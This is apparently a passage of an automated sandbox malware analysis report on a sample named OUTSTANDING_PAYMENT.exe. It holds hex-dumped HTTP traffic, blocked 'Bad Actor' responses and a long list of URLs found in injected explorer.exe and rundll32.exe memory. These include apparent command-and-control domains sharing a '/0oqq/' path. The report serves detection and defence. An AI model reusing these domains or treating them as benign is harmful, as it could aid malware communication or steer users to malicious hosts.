3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 57 22 20 6e 61 6d 65 3d 22 65 78 70 69 72 65 73 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 47 4f 4f 47 4c 45 42 4f 54 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 3e 0a 20 20 3c 21 2d 2d 20 46 6f 6c 6c 6f 77 69 6e 67 20 4d 65 74 61 2d 54 61 67 20 66 69 78 65 73 20 73 63 61 6c 69 6e 67 2d 69 73 73 75 65 73 20 6f 6e 20 6d 6f 62 69 6c 65 20 64 65 76 69 63 65 73 20 2d 2d 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 3b 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 3b 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 74 6e 65 72 22 3e 0a 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 27 3c 73 63 72 69 70 74 20 74 79 70 65 3d 2
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddenserver: openresty/1.13.6.1date: Mon, 20 Mar 2023 08:11:26 GMTcontent-type: text/htmlcontent-length: 175x-fail-reason: Bad Actorconnection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 33 2e 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>openresty/1.13.6.1</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddenserver: openresty/1.13.6.1date: Mon, 20 Mar 2023 08:11:29 GMTcontent-type: text/htmlcontent-length: 175x-fail-reason: Bad Actorconnection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 33 2e 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>openresty/1.13.6.1</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddenserver: openresty/1.13.6.1date: Mon, 20 Mar 2023 08:11:31 GMTcontent-type: text/htmlcontent-length: 175x-fail-reason: Bad Actorconnection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 33 2e 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>openresty/1.13.6.1</center></body></html>
          Source: rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://nic.ru/
          Source: rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://nic.ru/images/w8/win8transp.png
          Source: OUTSTANDING_PAYMENT.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://storage.nic.ru/ru/images/png/1.rc-logo-og.png
          Source: explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.allison2patrick.online
          Source: explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.allison2patrick.online/0oqq/
          Source: explorer.exe, 00000003.00000003.473077921.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.475275139.000000000F527000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.allison2patrick.online/0oqq/qt9TW=60_ljPJoqo6d2
          Source: explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.brennmansoluciones.com
          Source: explorer.exe, 00000003.00000002.791524546.000000000F52A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.473077921.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.475275139.000000000F527000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.brennmansoluciones.com/0oqq/
          Source: explorer.exe, 00000003.00000002.791524546.000000000F52A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.brennmansoluciones.com/0oqq/poIb=tYchV8
          Source: explorer.exe, 00000003.00000002.791524546.000000000F52A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.473077921.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.475275139.000000000F527000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.brennmansoluciones.com/0oqq/qt9TW=60_ljPJoqo6d2
          Source: explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dirdikyepedia.com
          Source: explorer.exe, 00000003.00000002.791524546.000000000F52A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.473077921.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.475275139.000000000F527000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dirdikyepedia.com/0oqq/
          Source: explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fanversewallet.com
          Source: explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fanversewallet.com/0oqq/
          Source: explorer.exe, 00000003.00000003.473077921.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.475275139.000000000F527000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fanversewallet.com/0oqq/qt9TW=60_ljPJoqo6d2
          Source: explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.g2fm.co.uk
          Source: explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.g2fm.co.uk/0oqq/
          Source: explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.glb-mobility.com
          Source: explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.glb-mobility.com/0oqq/
          Source: explorer.exe, 00000003.00000003.473077921.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.475275139.000000000F527000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.glb-mobility.com/0oqq/qt9TW=60_ljPJoqo6d2
          Source: explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gorwly.top
          Source: explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gorwly.top/0oqq/
          Source: explorer.exe, 00000003.00000003.473077921.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.475275139.000000000F527000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gorwly.top/0oqq/qt9TW=60_ljPJoqo6d2
          Source: explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hudsonandbailey.uk
          Source: explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hudsonandbailey.uk/0oqq/
          Source: explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.karlscurry.co.uk
          Source: explorer.exe, 00000003.00000003.473077921.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.475275139.000000000F527000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.karlscurry.co.uk/0oqq/
          Source: explorer.exe, 00000003.00000003.473077921.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.475275139.000000000F527000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.karlscurry.co.uk/0oqq/qt9TW=60_ljPJoqo6d2
          Source: explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ketoibabal.cyou
          Source: explorer.exe, 00000003.00000002.791524546.000000000F52A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.473077921.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.475275139.000000000F527000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ketoibabal.cyou/0oqq/
          Source: explorer.exe, 00000003.00000002.791524546.000000000F52A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.473077921.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.475275139.000000000F527000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ketoibabal.cyou/0oqq/qt9TW=60_ljPJoqo6d2
          Source: explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.landlotto.ru
          Source: explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.landlotto.ru/0oqq/
          Source: explorer.exe, 00000003.00000003.473077921.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.475275139.000000000F527000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.landlotto.ru/0oqq/qt9TW=60_ljPJoqo6d2
          Source: explorer.exe, 00000003.00000002.791524546.000000000F52A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.leewanyam.com
          Source: explorer.exe, 00000003.00000002.791524546.000000000F52A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.leewanyam.com/0oqq/
          Source: explorer.exe, 00000003.00000002.791524546.000000000F52A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.leewanyam.com/0oqq/poIb=tYchV8
          Source: rundll32.exe, 0000000D.00000002.781120791.000000000595E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.litespeedtech.com/error-page
          Source: explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mynichemarket.co.uk
          Source: explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mynichemarket.co.uk/0oqq/
          Source: explorer.exe, 00000003.00000003.473077921.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.475275139.000000000F527000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mynichemarket.co.uk/0oqq/qt9TW=60_ljPJoqo6d2
          Source: explorer.exe, 00000003.00000002.791524546.000000000F52A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sexopornoxx.store
          Source: explorer.exe, 00000003.00000002.791524546.000000000F52A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sexopornoxx.store/0oqq/
          Source: explorer.exe, 00000003.00000002.791524546.000000000F52A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sexopornoxx.store/0oqq/poIb=tYchV8
          Source: explorer.exe, 00000003.00000002.791524546.000000000F52A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thebang.sbs
          Source: explorer.exe, 00000003.00000002.791524546.000000000F52A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thebang.sbs/0oqq/
          Source: explorer.exe, 00000003.00000002.791524546.000000000F52A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thebang.sbs/0oqq/poIb=tYchV8
          Source: explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thelastwill.net
          Source: explorer.exe, 00000003.00000003.473077921.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.475275139.000000000F527000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thelastwill.net/0oqq/
          Source: explorer.exe, 00000003.00000003.473077921.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.475275139.000000000F527000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thelastwill.net/0oqq/qt9TW=60_ljPJoqo6d2
          Source: explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.themssterofssuepnse.rest
          Source: explorer.exe, 00000003.00000002.791524546.000000000F52A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.473077921.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.475275139.000000000F527000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.themssterofssuepnse.rest/0oqq/
          Source: explorer.exe, 00000003.00000002.791524546.000000000F52A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.themssterofssuepnse.rest/0oqq/poIb=tYchV8
          Source: explorer.exe, 00000003.00000002.791524546.000000000F52A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.473077921.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.475275139.000000000F527000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.themssterofssuepnse.rest/0oqq/qt9TW=60_ljPJoqo6d2
          Source: explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ty23vip.com
          Source: explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ty23vip.com/0oqq/
          Source: explorer.exe, 00000003.00000003.473077921.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.475275139.000000000F527000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ty23vip.com/0oqq/qt9TW=60_ljPJoqo6d2
          Source: explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.virginhairweave.co.uk
          Source: explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.virginhairweave.co.uk/0oqq/
          Source: 81EFaKSJ3.13.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: 81EFaKSJ3.13.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: rundll32.exe, 0000000D.00000002.781120791.0000000005FA6000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
          Source: 81EFaKSJ3.13.drString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: rundll32.exe, 0000000D.00000002.778376326.000000000310F000.00000004.00000020.00020000.00000000.sdmp, 81EFaKSJ3.13.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: 81EFaKSJ3.13.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: rundll32.exe, 0000000D.00000002.781120791.0000000005AF0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fasthosts.co.uk/
          Source: rundll32.exe, 0000000D.00000002.778376326.000000000310F000.00000004.00000020.00020000.00000000.sdmp, 81EFaKSJ3.13.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
          Source: rundll32.exe, 0000000D.00000002.778376326.000000000310F000.00000004.00000020.00020000.00000000.sdmp, 81EFaKSJ3.13.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
          Source: rundll32.exe, 0000000D.00000002.778376326.000000000310F000.00000004.00000020.00020000.00000000.sdmp, 81EFaKSJ3.13.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
          Source: rundll32.exe, 0000000D.00000002.778376326.000000000310F000.00000004.00000020.00020000.00000000.sdmp, 81EFaKSJ3.13.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
          Source: rundll32.exe, 0000000D.00000002.781120791.000000000645C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://tiao2022.vip:12306/?u=
          Source: rundll32.exe, 0000000D.00000002.781120791.0000000005AF0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.fasthosts.co.uk/contact?utm_source=domainparking&utm_medium=referral&utm_campaign=fh_par
          Source: rundll32.exe, 0000000D.00000002.781120791.0000000005AF0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.fasthosts.co.uk/domain-names/search/?domain=$
          Source: rundll32.exe, 0000000D.00000002.781120791.0000000005AF0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.fasthosts.co.uk/get-online?utm_source=domainparking&utm_medium=referral&utm_campaign=fh_
          Source: rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
          Source: rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.00000000054A8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
          Source: rundll32.exe, 0000000D.00000002.778376326.000000000310F000.00000004.00000020.00020000.00000000.sdmp, 81EFaKSJ3.13.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: rundll32.exe, 0000000D.00000002.781120791.0000000005AF0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-199510482-1
          Source: rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.nic.ru/auction/
          Source: rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.nic.ru/cata
          Source: rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.nic.ru/catalog/domains/
          Source: rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.nic.ru/catalog/domains/com/
          Source: rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.nic.ru/catalog/domains/rf/
          Source: rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.nic.ru/catalog/domains/ru/
          Source: rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.nic.ru/catalog/hosting/
          Source: rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.nic.ru/catalog/hosting/cms/?ipartner=6666&adv_id=click_cmsh&utm_source=stpg_all&utm_medi
          Source: rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.nic.ru/catalog/hosting/dedicated/
          Source: rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.nic.ru/catalog/hosting/shared/
          Source: rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.nic.ru/catalog/hosting/shared/?ipartner=6666&adv_id=click_vh&utm_source=stpg_all&utm_med
          Source: rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.nic.ru/catalog/hosting/vds-vps/
          Source: rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.nic.ru/catalog/mail/on-domain/
          Source: rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.nic.ru/catalog/mail/on-domain/?ipartner=6666&adv_id=click_mail&utm_source=stpg_all&utm_m
          Source: rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.nic.ru/catalog/sites/sitebuilder/
          Source: rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.nic.ru/catalog/sites/sitebuilder/?ipartner=6666&adv_id=click_sitebuild&utm_source=stpg_a
          Source: rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.nic.ru/catalog/ssl/
          Source: rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.nic.ru/help/statusnaya-stranica_4785.html?ipartner=6666&adv_id=faq&utm_source=stpg_all&u
          Source: rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.nic.ru/manager/?ipartner=6666&adv_id=lk_enter&utm_source=stpg_all&utm_medium=link&utm_ca
          Source: rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.nic.ru/opensearch.xml
          Source: rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.nic.ru/product/for-domain-use/web-forwarding/?ipartner=6666&adv_id=click_domain_forward&
